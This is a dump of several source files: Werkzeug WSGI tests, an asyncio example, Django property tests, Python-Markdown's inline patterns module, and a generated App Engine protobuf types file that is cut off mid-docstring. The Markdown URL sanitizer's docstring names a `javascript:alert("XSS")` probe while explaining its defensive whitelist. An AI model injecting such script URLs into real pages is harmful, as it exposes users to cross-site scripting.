repo_name (string, 5-100 chars) | ref (string, 12-67 chars) | path (string, 4-244 chars) | copies (string, 1-8 chars) | content (string, 0-1.05M chars, nullable ⌀)
---|---|---|---|---|
BarcampBangalore/Barcamp-Bangalore-Android-App | refs/heads/master | gcm_flask/werkzeug/testsuite/wsgi.py | 54 | # -*- coding: utf-8 -*-
"""
werkzeug.testsuite.wsgi
~~~~~~~~~~~~~~~~~~~~~~~
Tests the WSGI utilities.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from __future__ import with_statement
import unittest
from os import path
from cStringIO import StringIO
from werkzeug.testsuite import WerkzeugTestCase
from werkzeug.wrappers import BaseResponse
from werkzeug.exceptions import BadRequest, ClientDisconnected
from werkzeug.test import Client, create_environ, run_wsgi_app
from werkzeug import wsgi
class WSGIUtilsTestCase(WerkzeugTestCase):
def test_shareddatamiddleware_get_file_loader(self):
app = wsgi.SharedDataMiddleware(None, {})
assert callable(app.get_file_loader('foo'))
def test_shared_data_middleware(self):
def null_application(environ, start_response):
start_response('404 NOT FOUND', [('Content-Type', 'text/plain')])
yield 'NOT FOUND'
app = wsgi.SharedDataMiddleware(null_application, {
'/': path.join(path.dirname(__file__), 'res'),
'/sources': path.join(path.dirname(__file__), 'res'),
'/pkg': ('werkzeug.debug', 'shared')
})
for p in '/test.txt', '/sources/test.txt':
app_iter, status, headers = run_wsgi_app(app, create_environ(p))
assert status == '200 OK'
assert ''.join(app_iter).strip() == 'FOUND'
app_iter, status, headers = run_wsgi_app(app, create_environ('/pkg/debugger.js'))
contents = ''.join(app_iter)
assert '$(function() {' in contents
app_iter, status, headers = run_wsgi_app(app, create_environ('/missing'))
assert status == '404 NOT FOUND'
assert ''.join(app_iter).strip() == 'NOT FOUND'
def test_get_host(self):
env = {'HTTP_X_FORWARDED_HOST': 'example.org',
'SERVER_NAME': 'bullshit', 'HOST_NAME': 'ignore me dammit'}
assert wsgi.get_host(env) == 'example.org'
assert wsgi.get_host(create_environ('/', 'http://example.org')) \
== 'example.org'
def test_responder(self):
def foo(environ, start_response):
return BaseResponse('Test')
client = Client(wsgi.responder(foo), BaseResponse)
response = client.get('/')
assert response.status_code == 200
assert response.data == 'Test'
def test_pop_path_info(self):
original_env = {'SCRIPT_NAME': '/foo', 'PATH_INFO': '/a/b///c'}
# regular path info popping
def assert_tuple(script_name, path_info):
assert env.get('SCRIPT_NAME') == script_name
assert env.get('PATH_INFO') == path_info
env = original_env.copy()
pop = lambda: wsgi.pop_path_info(env)
assert_tuple('/foo', '/a/b///c')
assert pop() == 'a'
assert_tuple('/foo/a', '/b///c')
assert pop() == 'b'
assert_tuple('/foo/a/b', '///c')
assert pop() == 'c'
assert_tuple('/foo/a/b///c', '')
assert pop() is None
def test_peek_path_info(self):
env = {'SCRIPT_NAME': '/foo', 'PATH_INFO': '/aaa/b///c'}
assert wsgi.peek_path_info(env) == 'aaa'
assert wsgi.peek_path_info(env) == 'aaa'
def test_limited_stream(self):
class RaisingLimitedStream(wsgi.LimitedStream):
def on_exhausted(self):
raise BadRequest('input stream exhausted')
io = StringIO('123456')
stream = RaisingLimitedStream(io, 3)
assert stream.read() == '123'
self.assert_raises(BadRequest, stream.read)
io = StringIO('123456')
stream = RaisingLimitedStream(io, 3)
assert stream.read(1) == '1'
assert stream.read(1) == '2'
assert stream.read(1) == '3'
self.assert_raises(BadRequest, stream.read)
io = StringIO('123456\nabcdefg')
stream = wsgi.LimitedStream(io, 9)
assert stream.readline() == '123456\n'
assert stream.readline() == 'ab'
io = StringIO('123456\nabcdefg')
stream = wsgi.LimitedStream(io, 9)
assert stream.readlines() == ['123456\n', 'ab']
io = StringIO('123456\nabcdefg')
stream = wsgi.LimitedStream(io, 9)
assert stream.readlines(2) == ['12']
assert stream.readlines(2) == ['34']
assert stream.readlines() == ['56\n', 'ab']
io = StringIO('123456\nabcdefg')
stream = wsgi.LimitedStream(io, 9)
assert stream.readline(100) == '123456\n'
io = StringIO('123456\nabcdefg')
stream = wsgi.LimitedStream(io, 9)
assert stream.readlines(100) == ['123456\n', 'ab']
io = StringIO('123456')
stream = wsgi.LimitedStream(io, 3)
assert stream.read(1) == '1'
assert stream.read(1) == '2'
assert stream.read() == '3'
assert stream.read() == ''
io = StringIO('123456')
stream = wsgi.LimitedStream(io, 3)
assert stream.read(-1) == '123'
def test_limited_stream_disconnection(self):
io = StringIO('A bit of content')
# disconnect detection on out of bytes
stream = wsgi.LimitedStream(io, 255)
with self.assert_raises(ClientDisconnected):
stream.read()
# disconnect detection because file close
io = StringIO('x' * 255)
io.close()
stream = wsgi.LimitedStream(io, 255)
with self.assert_raises(ClientDisconnected):
stream.read()
def test_path_info_extraction(self):
x = wsgi.extract_path_info('http://example.com/app', '/app/hello')
assert x == u'/hello'
x = wsgi.extract_path_info('http://example.com/app',
'https://example.com/app/hello')
assert x == u'/hello'
x = wsgi.extract_path_info('http://example.com/app/',
'https://example.com/app/hello')
assert x == u'/hello'
x = wsgi.extract_path_info('http://example.com/app/',
'https://example.com/app')
assert x == u'/'
x = wsgi.extract_path_info(u'http://☃.net/', u'/fööbär')
assert x == u'/fööbär'
x = wsgi.extract_path_info(u'http://☃.net/x', u'http://☃.net/x/fööbär')
assert x == u'/fööbär'
env = create_environ(u'/fööbär', u'http://☃.net/x/')
x = wsgi.extract_path_info(env, u'http://☃.net/x/fööbär')
assert x == u'/fööbär'
x = wsgi.extract_path_info('http://example.com/app/',
'https://example.com/a/hello')
assert x is None
x = wsgi.extract_path_info('http://example.com/app/',
'https://example.com/app/hello',
collapse_http_schemes=False)
assert x is None
def test_get_host_fallback(self):
assert wsgi.get_host({
'SERVER_NAME': 'foobar.example.com',
'wsgi.url_scheme': 'http',
'SERVER_PORT': '80'
}) == 'foobar.example.com'
assert wsgi.get_host({
'SERVER_NAME': 'foobar.example.com',
'wsgi.url_scheme': 'http',
'SERVER_PORT': '81'
}) == 'foobar.example.com:81'
def test_multi_part_line_breaks(self):
data = 'abcdef\r\nghijkl\r\nmnopqrstuvwxyz\r\nABCDEFGHIJK'
test_stream = StringIO(data)
lines = list(wsgi.make_line_iter(test_stream, limit=len(data), buffer_size=16))
assert lines == ['abcdef\r\n', 'ghijkl\r\n', 'mnopqrstuvwxyz\r\n', 'ABCDEFGHIJK']
data = 'abc\r\nThis line is broken by the buffer length.\r\nFoo bar baz'
test_stream = StringIO(data)
lines = list(wsgi.make_line_iter(test_stream, limit=len(data), buffer_size=24))
assert lines == ['abc\r\n', 'This line is broken by the buffer length.\r\n', 'Foo bar baz']
def test_multi_part_line_breaks_problematic(self):
data = 'abc\rdef\r\nghi'
for x in xrange(1, 10):
test_stream = StringIO(data)
lines = list(wsgi.make_line_iter(test_stream, limit=len(data), buffer_size=4))
assert lines == ['abc\r', 'def\r\n', 'ghi']
def test_lines_longer_buffer_size(self):
data = '1234567890\n1234567890\n'
for bufsize in xrange(1, 15):
            lines = list(wsgi.make_line_iter(StringIO(data), limit=len(data), buffer_size=bufsize))
self.assert_equal(lines, ['1234567890\n', '1234567890\n'])
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(WSGIUtilsTestCase))
return suite
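# Illustrative sketch (not part of the original module): the suite() factory
# above can be driven directly with the standard library test runner, e.g.:
#
#   if __name__ == '__main__':
#       unittest.TextTestRunner(verbosity=2).run(suite())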
|
showa-yojyo/bin | refs/heads/master | async/async10gather.py | 1 | #!/usr/bin/env python
"""async10gather.py: Use gather
Usage:
async10gather.py
"""
import asyncio
async def factorial(name, number):
f = 1
for i in range(2, number + 1):
print(f"Task {name}: Compute factorial({i})...")
await asyncio.sleep(1)
f *= i
print(f"Task {name}: factorial({i}) = {f}")
def main():
    loop = asyncio.get_event_loop()
loop.run_until_complete(asyncio.gather(
factorial("A", 2),
factorial("B", 3),
factorial("C", 4)))
loop.close()
if __name__ == '__main__':
main()
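# Note (an assumption, not part of the original script): on Python 3.7+ the
# same result can be obtained without managing the event loop by hand:
#
#   async def amain():
#       await asyncio.gather(factorial("A", 2), factorial("B", 3), factorial("C", 4))
#   asyncio.run(amain())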
|
yencarnacion/jaikuengine | refs/heads/master | .google_appengine/lib/django-1.2/tests/modeltests/properties/tests.py | 92 | from django.test import TestCase
from models import Person
class PropertyTests(TestCase):
def setUp(self):
self.a = Person(first_name='John', last_name='Lennon')
self.a.save()
def test_getter(self):
self.assertEqual(self.a.full_name, 'John Lennon')
def test_setter(self):
# The "full_name" property hasn't provided a "set" method.
self.assertRaises(AttributeError, setattr, self.a, 'full_name', 'Paul McCartney')
# But "full_name_2" has, and it can be used to initialise the class.
a2 = Person(full_name_2 = 'Paul McCartney')
a2.save()
self.assertEqual(a2.first_name, 'Paul')
|
dewitt/appengine-markdown | refs/heads/master | markdown/inlinepatterns.py | 5 | """
INLINE PATTERNS
=============================================================================
Inline patterns such as *emphasis* are handled by means of auxiliary
objects, one per pattern. Pattern objects must be instances of classes
that extend markdown.Pattern. Each pattern object uses a single regular
expression and needs to support the following methods:
pattern.getCompiledRegExp() # returns a regular expression
pattern.handleMatch(m) # takes a match object and returns
# an ElementTree element or just plain text
All of python markdown's built-in patterns subclass from Pattern,
but you can add additional patterns that don't.
Also note that all the regular expressions used by inline patterns must
capture the whole block. For this reason, every expression is wrapped with
'^(.*?)' at the start and '(.*?)$' at the end; this wrapping is added
automatically in Pattern, so individual pattern strings do not include it.
Finally, the order in which regular expressions are applied is very
important - e.g. if we first replace http://.../ links with <a> tags
and _then_ try to replace inline html, we would end up with a mess.
So, we apply the expressions in the following order:
* escape and backticks have to go before everything else, so
that we can preempt any markdown patterns by escaping them.
* then we handle auto-links (must be done before inline html)
* then we handle inline HTML. At this point we will simply
replace all inline HTML strings with a placeholder and add
the actual HTML to a hash.
* then inline images (must be done before links)
* then bracketed links, first regular then reference-style
* finally we apply strong and emphasis
"""
import markdown
import re
from urlparse import urlparse, urlunparse
import sys
if sys.version >= "3.0":
from html import entities as htmlentitydefs
else:
import htmlentitydefs
"""
The actual regular expressions for patterns
-----------------------------------------------------------------------------
"""
NOBRACKET = r'[^\]\[]*'
BRK = ( r'\[('
+ (NOBRACKET + r'(\[')*6
+ (NOBRACKET+ r'\])*')*6
+ NOBRACKET + r')\]' )
NOIMG = r'(?<!\!)'
BACKTICK_RE = r'(?<!\\)(`+)(.+?)(?<!`)\2(?!`)' # `e=f()` or ``e=f("`")``
ESCAPE_RE = r'\\(.)' # \<
EMPHASIS_RE = r'(\*)([^\*]*)\2' # *emphasis*
STRONG_RE = r'(\*{2}|_{2})(.*?)\2' # **strong**
STRONG_EM_RE = r'(\*{3}|_{3})(.*?)\2' # ***strong***
if markdown.SMART_EMPHASIS:
EMPHASIS_2_RE = r'(?<!\S)(_)(\S.*?)\2' # _emphasis_
else:
EMPHASIS_2_RE = r'(_)(.*?)\2' # _emphasis_
LINK_RE = NOIMG + BRK + \
r'''\(\s*(<.*?>|((?:(?:\(.*?\))|[^\(\)]))*?)\s*((['"])(.*)\12)?\)'''
# [text](url) or [text](<url>)
IMAGE_LINK_RE = r'\!' + BRK + r'\s*\((<.*?>|([^\)]*))\)'
#  or 
REFERENCE_RE = NOIMG + BRK+ r'\s*\[([^\]]*)\]' # [Google][3]
IMAGE_REFERENCE_RE = r'\!' + BRK + '\s*\[([^\]]*)\]' # ![alt text][2]
NOT_STRONG_RE = r'( \* )' # stand-alone * or _
AUTOLINK_RE = r'<((?:f|ht)tps?://[^>]*)>' # <http://www.123.com>
AUTOMAIL_RE = r'<([^> \!]*@[^> ]*)>' # <me@example.com>
HTML_RE = r'(\<([a-zA-Z/][^\>]*?|\!--.*?--)\>)' # <...>
ENTITY_RE = r'(&[\#a-zA-Z0-9]*;)' # &amp;
LINE_BREAK_RE = r' \n' # two spaces at end of line
LINE_BREAK_2_RE = r' $' # two spaces at end of text
def dequote(string):
"""Remove quotes from around a string."""
if ( ( string.startswith('"') and string.endswith('"'))
or (string.startswith("'") and string.endswith("'")) ):
return string[1:-1]
else:
return string
ATTR_RE = re.compile("\{@([^\}]*)=([^\}]*)}") # {@id=123}
def handleAttributes(text, parent):
"""Set values of an element based on attribute definitions ({@id=123})."""
def attributeCallback(match):
parent.set(match.group(1), match.group(2))
return ATTR_RE.sub(attributeCallback, text)
"""
The pattern classes
-----------------------------------------------------------------------------
"""
class Pattern:
"""Base class that inline patterns subclass. """
def __init__ (self, pattern, markdown_instance=None):
"""
        Create an instance of an inline pattern.
Keyword arguments:
* pattern: A regular expression that matches a pattern
"""
self.pattern = pattern
self.compiled_re = re.compile("^(.*?)%s(.*?)$" % pattern, re.DOTALL)
# Api for Markdown to pass safe_mode into instance
self.safe_mode = False
if markdown_instance:
self.markdown = markdown_instance
def getCompiledRegExp (self):
""" Return a compiled regular expression. """
return self.compiled_re
def handleMatch(self, m):
"""Return a ElementTree element from the given match.
Subclasses should override this method.
Keyword arguments:
* m: A re match object containing a match of the pattern.
"""
pass
def type(self):
""" Return class name, to define pattern type """
return self.__class__.__name__
BasePattern = Pattern # for backward compatibility
class SimpleTextPattern (Pattern):
""" Return a simple text of group(2) of a Pattern. """
def handleMatch(self, m):
text = m.group(2)
if text == markdown.INLINE_PLACEHOLDER_PREFIX:
return None
return text
class SimpleTagPattern (Pattern):
"""
Return element of type `tag` with a text attribute of group(3)
of a Pattern.
"""
def __init__ (self, pattern, tag):
Pattern.__init__(self, pattern)
self.tag = tag
def handleMatch(self, m):
el = markdown.etree.Element(self.tag)
el.text = m.group(3)
return el
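# Illustrative sketch (an assumption, not part of the original module): a new
# inline syntax can be added by instantiating one of these pattern classes and
# registering it on a Markdown instance, e.g. ~~strikethrough~~ rendered as a
# <del> element. Following the module convention, the backreference is written
# as \2 because Pattern prepends one extra capturing group when compiling.
#
#   DEL_RE = r'(~{2})(.+?)\2'   # ~~strikethrough~~
#   md = markdown.Markdown()
#   md.inlinePatterns['del'] = SimpleTagPattern(DEL_RE, 'del')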
class SubstituteTagPattern (SimpleTagPattern):
""" Return a eLement of type `tag` with no children. """
def handleMatch (self, m):
return markdown.etree.Element(self.tag)
class BacktickPattern (Pattern):
""" Return a `<code>` element containing the matching text. """
def __init__ (self, pattern):
Pattern.__init__(self, pattern)
self.tag = "code"
def handleMatch(self, m):
el = markdown.etree.Element(self.tag)
el.text = markdown.AtomicString(m.group(3).strip())
return el
class DoubleTagPattern (SimpleTagPattern):
"""Return a ElementTree element nested in tag2 nested in tag1.
Useful for strong emphasis etc.
"""
def handleMatch(self, m):
tag1, tag2 = self.tag.split(",")
el1 = markdown.etree.Element(tag1)
el2 = markdown.etree.SubElement(el1, tag2)
el2.text = m.group(3)
return el1
class HtmlPattern (Pattern):
""" Store raw inline html and return a placeholder. """
def handleMatch (self, m):
rawhtml = m.group(2)
inline = True
place_holder = self.markdown.htmlStash.store(rawhtml)
return place_holder
class LinkPattern (Pattern):
""" Return a link element from the given match. """
def handleMatch(self, m):
el = markdown.etree.Element("a")
el.text = m.group(2)
title = m.group(11)
href = m.group(9)
if href:
if href[0] == "<":
href = href[1:-1]
el.set("href", self.sanitize_url(href.strip()))
else:
el.set("href", "")
if title:
            title = dequote(title) #.replace('"', "&quot;")
el.set("title", title)
return el
def sanitize_url(self, url):
"""
Sanitize a url against xss attacks in "safe_mode".
Rather than specifically blacklisting `javascript:alert("XSS")` and all
its aliases (see <http://ha.ckers.org/xss.html>), we whitelist known
safe url formats. Most urls contain a network location, however some
are known not to (i.e.: mailto links). Script urls do not contain a
location. Additionally, for `javascript:...`, the scheme would be
"javascript" but some aliases will appear to `urlparse()` to have no
scheme. On top of that relative links (i.e.: "foo/bar.html") have no
scheme. Therefore we must check "path", "parameters", "query" and
"fragment" for any literal colons. We don't check "scheme" for colons
because it *should* never have any and "netloc" must allow the form:
`username:password@host:port`.
"""
locless_schemes = ['', 'mailto', 'news']
scheme, netloc, path, params, query, fragment = url = urlparse(url)
safe_url = False
if netloc != '' or scheme in locless_schemes:
safe_url = True
for part in url[2:]:
if ":" in part:
safe_url = False
if self.markdown.safeMode and not safe_url:
return ''
else:
return urlunparse(url)
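    # For example (behaviour follows from the checks above): with safe_mode
    # enabled, 'javascript:alert("XSS")' has no netloc and an unlisted scheme,
    # so '' is returned, while 'mailto:user@example.com' and relative paths
    # such as 'foo/bar.html' are returned unchanged.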
class ImagePattern(LinkPattern):
""" Return a img element from the given match. """
def handleMatch(self, m):
el = markdown.etree.Element("img")
src_parts = m.group(9).split()
if src_parts:
src = src_parts[0]
if src[0] == "<" and src[-1] == ">":
src = src[1:-1]
el.set('src', self.sanitize_url(src))
else:
el.set('src', "")
if len(src_parts) > 1:
el.set('title', dequote(" ".join(src_parts[1:])))
if markdown.ENABLE_ATTRIBUTES:
truealt = handleAttributes(m.group(2), el)
else:
truealt = m.group(2)
el.set('alt', truealt)
return el
class ReferencePattern(LinkPattern):
""" Match to a stored reference and return link element. """
def handleMatch(self, m):
if m.group(9):
id = m.group(9).lower()
else:
# if we got something like "[Google][]"
# we'll use "google" as the id
id = m.group(2).lower()
if not id in self.markdown.references: # ignore undefined refs
return None
href, title = self.markdown.references[id]
text = m.group(2)
return self.makeTag(href, title, text)
def makeTag(self, href, title, text):
el = markdown.etree.Element('a')
el.set('href', self.sanitize_url(href))
if title:
el.set('title', title)
el.text = text
return el
class ImageReferencePattern (ReferencePattern):
""" Match to a stored reference and return img element. """
def makeTag(self, href, title, text):
el = markdown.etree.Element("img")
el.set("src", self.sanitize_url(href))
if title:
el.set("title", title)
el.set("alt", text)
return el
class AutolinkPattern (Pattern):
""" Return a link Element given an autolink (`<http://example/com>`). """
def handleMatch(self, m):
el = markdown.etree.Element("a")
el.set('href', m.group(2))
el.text = markdown.AtomicString(m.group(2))
return el
class AutomailPattern (Pattern):
"""
    Return a mailto link Element given an automail link (`<foo@example.com>`).
"""
def handleMatch(self, m):
el = markdown.etree.Element('a')
email = m.group(2)
if email.startswith("mailto:"):
email = email[len("mailto:"):]
def codepoint2name(code):
"""Return entity definition by code, or the code if not defined."""
entity = htmlentitydefs.codepoint2name.get(code)
if entity:
return "%s%s;" % (markdown.AMP_SUBSTITUTE, entity)
else:
return "%s#%d;" % (markdown.AMP_SUBSTITUTE, code)
letters = [codepoint2name(ord(letter)) for letter in email]
el.text = markdown.AtomicString(''.join(letters))
mailto = "mailto:" + email
mailto = "".join([markdown.AMP_SUBSTITUTE + '#%d;' %
ord(letter) for letter in mailto])
el.set('href', mailto)
return el
|
googleapis/googleapis-gen | refs/heads/master | google/appengine/v1/google-cloud-appengine-v1-py/google/cloud/appengine_admin_v1/types/version.py | 1 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.cloud.appengine_admin_v1.types import app_yaml
from google.cloud.appengine_admin_v1.types import deploy
from google.protobuf import duration_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
__protobuf__ = proto.module(
package='google.appengine.v1',
manifest={
'InboundServiceType',
'ServingStatus',
'Version',
'EndpointsApiService',
'AutomaticScaling',
'BasicScaling',
'ManualScaling',
'CpuUtilization',
'RequestUtilization',
'DiskUtilization',
'NetworkUtilization',
'StandardSchedulerSettings',
'Network',
'Volume',
'Resources',
'VpcAccessConnector',
'Entrypoint',
},
)
class InboundServiceType(proto.Enum):
r"""Available inbound services."""
INBOUND_SERVICE_UNSPECIFIED = 0
INBOUND_SERVICE_MAIL = 1
INBOUND_SERVICE_MAIL_BOUNCE = 2
INBOUND_SERVICE_XMPP_ERROR = 3
INBOUND_SERVICE_XMPP_MESSAGE = 4
INBOUND_SERVICE_XMPP_SUBSCRIBE = 5
INBOUND_SERVICE_XMPP_PRESENCE = 6
INBOUND_SERVICE_CHANNEL_PRESENCE = 7
INBOUND_SERVICE_WARMUP = 9
class ServingStatus(proto.Enum):
r"""Run states of a version."""
SERVING_STATUS_UNSPECIFIED = 0
SERVING = 1
STOPPED = 2
class Version(proto.Message):
r"""A Version resource is a specific set of source code and
configuration files that are deployed into a service.
Attributes:
name (str):
Full path to the Version resource in the API. Example:
``apps/myapp/services/default/versions/v1``.
@OutputOnly
id (str):
Relative name of the version within the service. Example:
``v1``. Version names can contain only lowercase letters,
numbers, or hyphens. Reserved names: "default", "latest",
and any name with the prefix "ah-".
automatic_scaling (google.cloud.appengine_admin_v1.types.AutomaticScaling):
Automatic scaling is based on request rate,
response latencies, and other application
metrics. Instances are dynamically created and
destroyed as needed in order to handle traffic.
basic_scaling (google.cloud.appengine_admin_v1.types.BasicScaling):
A service with basic scaling will create an
instance when the application receives a
request. The instance will be turned down when
the app becomes idle. Basic scaling is ideal for
work that is intermittent or driven by user
activity.
manual_scaling (google.cloud.appengine_admin_v1.types.ManualScaling):
A service with manual scaling runs
continuously, allowing you to perform complex
initialization and rely on the state of its
memory over time. Manually scaled versions are
sometimes referred to as "backends".
inbound_services (Sequence[google.cloud.appengine_admin_v1.types.InboundServiceType]):
Before an application can receive email or
XMPP messages, the application must be
configured to enable the service.
instance_class (str):
Instance class that is used to run this version. Valid
values are:
- AutomaticScaling: ``F1``, ``F2``, ``F4``, ``F4_1G``
- ManualScaling or BasicScaling: ``B1``, ``B2``, ``B4``,
``B8``, ``B4_1G``
Defaults to ``F1`` for AutomaticScaling and ``B1`` for
ManualScaling or BasicScaling.
network (google.cloud.appengine_admin_v1.types.Network):
Extra network settings.
Only applicable in the App Engine flexible
environment.
zones (Sequence[str]):
The Google Compute Engine zones that are
supported by this version in the App Engine
flexible environment. Deprecated.
resources (google.cloud.appengine_admin_v1.types.Resources):
Machine resources for this version.
Only applicable in the App Engine flexible
environment.
runtime (str):
Desired runtime. Example: ``python27``.
runtime_channel (str):
The channel of the runtime to use. Only available for some
runtimes. Defaults to the ``default`` channel.
threadsafe (bool):
Whether multiple requests can be dispatched
to this version at once.
vm (bool):
Whether to deploy this version in a container
on a virtual machine.
beta_settings (Sequence[google.cloud.appengine_admin_v1.types.Version.BetaSettingsEntry]):
Metadata settings that are supplied to this
version to enable beta runtime features.
env (str):
App Engine execution environment for this version.
Defaults to ``standard``.
serving_status (google.cloud.appengine_admin_v1.types.ServingStatus):
Current serving status of this version. Only the versions
with a ``SERVING`` status create instances and can be
billed.
``SERVING_STATUS_UNSPECIFIED`` is an invalid value. Defaults
to ``SERVING``.
created_by (str):
Email address of the user who created this
version.
@OutputOnly
create_time (google.protobuf.timestamp_pb2.Timestamp):
Time that this version was created.
@OutputOnly
disk_usage_bytes (int):
Total size in bytes of all the files that are
included in this version and currently hosted on
the App Engine disk.
@OutputOnly
runtime_api_version (str):
The version of the API in the given runtime
environment. Please see the app.yaml reference
for valid values at
https://cloud.google.com/appengine/docs/standard/<language>/config/appref
runtime_main_executable_path (str):
The path or name of the app's main
executable.
service_account (str):
The identity that the deployed version will
run as. Admin API will use the App Engine
Appspot service account as default if this field
is neither provided in app.yaml file nor through
CLI flag.
handlers (Sequence[google.cloud.appengine_admin_v1.types.UrlMap]):
An ordered list of URL-matching patterns that should be
applied to incoming requests. The first matching URL handles
the request and other request handlers are not attempted.
Only returned in ``GET`` requests if ``view=FULL`` is set.
error_handlers (Sequence[google.cloud.appengine_admin_v1.types.ErrorHandler]):
Custom static error pages. Limited to 10KB per page.
Only returned in ``GET`` requests if ``view=FULL`` is set.
libraries (Sequence[google.cloud.appengine_admin_v1.types.Library]):
Configuration for third-party Python runtime libraries that
are required by the application.
Only returned in ``GET`` requests if ``view=FULL`` is set.
api_config (google.cloud.appengine_admin_v1.types.ApiConfigHandler):
Serving configuration for `Google Cloud
Endpoints <https://cloud.google.com/appengine/docs/python/endpoints/>`__.
Only returned in ``GET`` requests if ``view=FULL`` is set.
env_variables (Sequence[google.cloud.appengine_admin_v1.types.Version.EnvVariablesEntry]):
Environment variables available to the application.
Only returned in ``GET`` requests if ``view=FULL`` is set.
build_env_variables (Sequence[google.cloud.appengine_admin_v1.types.Version.BuildEnvVariablesEntry]):
Environment variables available to the build environment.
Only returned in ``GET`` requests if ``view=FULL`` is set.
default_expiration (google.protobuf.duration_pb2.Duration):
Duration that static files should be cached by web proxies
and browsers. Only applicable if the corresponding
`StaticFilesHandler <https://cloud.google.com/appengine/docs/admin-api/reference/rest/v1/apps.services.versions#StaticFilesHandler>`__
does not specify its own expiration time.
Only returned in ``GET`` requests if ``view=FULL`` is set.
health_check (google.cloud.appengine_admin_v1.types.HealthCheck):
Configures health checking for instances. Unhealthy
instances are stopped and replaced with new instances. Only
applicable in the App Engine flexible environment.
Only returned in ``GET`` requests if ``view=FULL`` is set.
readiness_check (google.cloud.appengine_admin_v1.types.ReadinessCheck):
Configures readiness health checking for instances.
Unhealthy instances are not put into the backend traffic
rotation.
Only returned in ``GET`` requests if ``view=FULL`` is set.
liveness_check (google.cloud.appengine_admin_v1.types.LivenessCheck):
Configures liveness health checking for instances. Unhealthy
instances are stopped and replaced with new instances
Only returned in ``GET`` requests if ``view=FULL`` is set.
nobuild_files_regex (str):
Files that match this pattern will not be built into this
version. Only applicable for Go runtimes.
Only returned in ``GET`` requests if ``view=FULL`` is set.
deployment (google.cloud.appengine_admin_v1.types.Deployment):
Code and application artifacts that make up this version.
Only returned in ``GET`` requests if ``view=FULL`` is set.
version_url (str):
Serving URL for this version. Example:
"https://myversion-dot-myservice-dot-
myapp.appspot.com"
@OutputOnly
endpoints_api_service (google.cloud.appengine_admin_v1.types.EndpointsApiService):
Cloud Endpoints configuration.
If endpoints_api_service is set, the Cloud Endpoints
Extensible Service Proxy will be provided to serve the API
implemented by the app.
entrypoint (google.cloud.appengine_admin_v1.types.Entrypoint):
The entrypoint for the application.
vpc_access_connector (google.cloud.appengine_admin_v1.types.VpcAccessConnector):
Enables VPC connectivity for standard apps.
"""
name = proto.Field(
proto.STRING,
number=1,
)
id = proto.Field(
proto.STRING,
number=2,
)
automatic_scaling = proto.Field(
proto.MESSAGE,
number=3,
oneof='scaling',
message='AutomaticScaling',
)
basic_scaling = proto.Field(
proto.MESSAGE,
number=4,
oneof='scaling',
message='BasicScaling',
)
manual_scaling = proto.Field(
proto.MESSAGE,
number=5,
oneof='scaling',
message='ManualScaling',
)
inbound_services = proto.RepeatedField(
proto.ENUM,
number=6,
enum='InboundServiceType',
)
instance_class = proto.Field(
proto.STRING,
number=7,
)
network = proto.Field(
proto.MESSAGE,
number=8,
message='Network',
)
zones = proto.RepeatedField(
proto.STRING,
number=118,
)
resources = proto.Field(
proto.MESSAGE,
number=9,
message='Resources',
)
runtime = proto.Field(
proto.STRING,
number=10,
)
runtime_channel = proto.Field(
proto.STRING,
number=117,
)
threadsafe = proto.Field(
proto.BOOL,
number=11,
)
vm = proto.Field(
proto.BOOL,
number=12,
)
beta_settings = proto.MapField(
proto.STRING,
proto.STRING,
number=13,
)
env = proto.Field(
proto.STRING,
number=14,
)
serving_status = proto.Field(
proto.ENUM,
number=15,
enum='ServingStatus',
)
created_by = proto.Field(
proto.STRING,
number=16,
)
create_time = proto.Field(
proto.MESSAGE,
number=17,
message=timestamp_pb2.Timestamp,
)
disk_usage_bytes = proto.Field(
proto.INT64,
number=18,
)
runtime_api_version = proto.Field(
proto.STRING,
number=21,
)
runtime_main_executable_path = proto.Field(
proto.STRING,
number=22,
)
service_account = proto.Field(
proto.STRING,
number=127,
)
handlers = proto.RepeatedField(
proto.MESSAGE,
number=100,
message=app_yaml.UrlMap,
)
error_handlers = proto.RepeatedField(
proto.MESSAGE,
number=101,
message=app_yaml.ErrorHandler,
)
libraries = proto.RepeatedField(
proto.MESSAGE,
number=102,
message=app_yaml.Library,
)
api_config = proto.Field(
proto.MESSAGE,
number=103,
message=app_yaml.ApiConfigHandler,
)
env_variables = proto.MapField(
proto.STRING,
proto.STRING,
number=104,
)
build_env_variables = proto.MapField(
proto.STRING,
proto.STRING,
number=125,
)
default_expiration = proto.Field(
proto.MESSAGE,
number=105,
message=duration_pb2.Duration,
)
health_check = proto.Field(
proto.MESSAGE,
number=106,
message=app_yaml.HealthCheck,
)
readiness_check = proto.Field(
proto.MESSAGE,
number=112,
message=app_yaml.ReadinessCheck,
)
liveness_check = proto.Field(
proto.MESSAGE,
number=113,
message=app_yaml.LivenessCheck,
)
nobuild_files_regex = proto.Field(
proto.STRING,
number=107,
)
deployment = proto.Field(
proto.MESSAGE,
number=108,
message=deploy.Deployment,
)
version_url = proto.Field(
proto.STRING,
number=109,
)
endpoints_api_service = proto.Field(
proto.MESSAGE,
number=110,
message='EndpointsApiService',
)
entrypoint = proto.Field(
proto.MESSAGE,
number=122,
message='Entrypoint',
)
vpc_access_connector = proto.Field(
proto.MESSAGE,
number=121,
message='VpcAccessConnector',
)
class EndpointsApiService(proto.Message):
r"""`Cloud Endpoints <https://cloud.google.com/endpoints>`__
configuration. The Endpoints API Service provides tooling for
serving Open API and gRPC endpoints via an NGINX proxy. Only valid
for App Engine Flexible environment deployments.
The fields here refer to the name and configuration ID of a
"service" resource in the `Service Management
API <https://cloud.google.com/service-management/overview>`__.
Attributes:
name (str):
Endpoints service name which is the name of
the "service" resource in the Service Management
API. For example
"myapi.endpoints.myproject.cloud.goog".
config_id (str):
Endpoints service configuration ID as specified by the
Service Management API. For example "2016-09-19r1".
By default, the rollout strategy for Endpoints is
``RolloutStrategy.FIXED``. This means that Endpoints starts
up with a particular configuration ID. When a new
configuration is rolled out, Endpoints must be given the new
configuration ID. The ``config_id`` field is used to give
the configuration ID and is required in this case.
